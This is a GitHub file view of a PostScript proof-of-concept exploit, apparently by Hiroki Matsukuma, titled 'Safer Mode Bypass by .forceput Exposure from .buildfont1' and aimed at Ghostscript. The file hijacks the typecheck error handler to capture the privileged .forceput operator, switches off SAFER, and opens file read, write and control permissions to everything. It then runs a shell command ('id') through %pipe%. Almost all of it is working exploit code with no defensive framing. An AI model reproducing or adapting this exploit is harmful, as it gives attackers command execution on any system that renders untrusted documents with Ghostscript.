-
Notifications
You must be signed in to change notification settings - Fork 2
/
ghostrule4.ps
79 lines (69 loc) · 2.15 KB
/
ghostrule4.ps
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
%!PS
%%
%% Safer Mode Bypass by `.forceput` Exposure from `.buildfont1`
%%
%% Author: Hiroki MATSUKUMA
%%
/println { (\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
(r) file
dup MaxFileSize string readstring pop
exch closefile
} bind executeonly def
/osexec {
(%pipe%) exch concatstrings readfile
} bind executeonly def
(=============================================================================)
(= Safer Mode Bypass by `.forceput` Exposure from `.buildfont1` =)
(=============================================================================)
println println println
(Obtaining .forceput operator from .buildfont1 operator...) info
/.forceput null def
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
errordict /typecheck {
/typecheckcount typecheckcount 1 add def
typecheckcount 10 eq {
3 index 13 get
/.forceput exch store
pop false
} if
} put
null null .buildfont1 clear
errordict /typecheck currentdict /&typecheck get put
[
/&typecheck
/typecheckcount
] { currentdict exch undef } forall
(A candidate for .forceput operator found!) success
(Attempting sanity check with the candidate for .forceput operator...) info
<< /overwritten false >> readonly
begin
currentdict /overwritten true .forceput
overwritten not {
/.forceput where { /.forceput undef } if
} if
end
currentdict /.forceput known not {
(.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success
(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
save restore
SAFER {
(Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success
(Executing a shell command...) info
(id) osexec print
(PS: I pwned you <3) success
quit